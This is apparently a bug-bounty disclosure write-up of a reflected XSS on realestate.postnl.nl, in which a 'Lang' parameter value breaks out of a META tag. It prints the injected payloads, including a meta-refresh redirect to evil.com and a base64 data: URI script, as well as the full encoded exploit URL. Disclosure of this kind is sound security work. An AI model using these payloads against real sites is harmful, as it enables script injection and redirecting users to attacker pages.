XSS bypass using META tag in realestate.postnl.nl
Hi readers ,
Today I will write about a XSS Vulnerability I reported to postnl.nl bug bounty Program .
Vulnerable Endpoint :- http://realestate.postnl.nl/?Lang=
To test a normal Reflected XSS I Input “><xsstest> in the Lang parameter and in source it was reflected properly inside META tag like below :-
<meta name="language" content=""><xsstest>" />
Looks simple right ? Then wait a little :’) . Then I Inputted “><img src=x> and I got :-
I tried with many HTML tags and I got 2 points here :-
- Any Valid HTML tag is not allowed .
- I can created any attributes here .
So I googled for meta tag attributes and got :-
The http-equiv attribute took my attention . Now I again google more about it and learned that :-
META tag has the http-equiv directive. This directive allows you to define the equivalent of an HTTP header in the HTML code . The http-equiv directive can take a value of refresh , which can be used to redirect a user to another page.
Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and response was :-
<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />
<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />
And now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I got XSS popup .
They again Fixed the issue and listed My name on their Hall Of Fame page & also offered to send some goodies 😍😍😍 .
Thanks for reading .
Follow me on twitter
If you have any query ask me on Facebook